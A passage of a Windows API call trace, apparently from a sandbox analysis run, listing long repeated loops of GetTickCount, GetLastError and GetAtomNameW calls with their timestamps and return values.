GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.478] GetTickCount () returned 0x1155532 [0040.478] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.479] GetLastError () returned 0x0 [0040.479] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.480] GetTickCount () returned 0x1155532 [0040.480] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.481] GetTickCount () returned 0x1155532 [0040.481] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.482] GetTickCount () returned 0x1155532 [0040.482] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.483] GetTickCount () returned 0x1155532 [0040.483] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.484] GetTickCount () returned 0x1155532 [0040.484] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.485] GetTickCount () returned 0x1155532 [0040.485] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.486] GetTickCount () returned 0x1155532 [0040.486] GetLastError () returned 0x0 [0040.617] lstrlenA (lpString="") returned 0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.617] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.618] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.619] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.620] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) 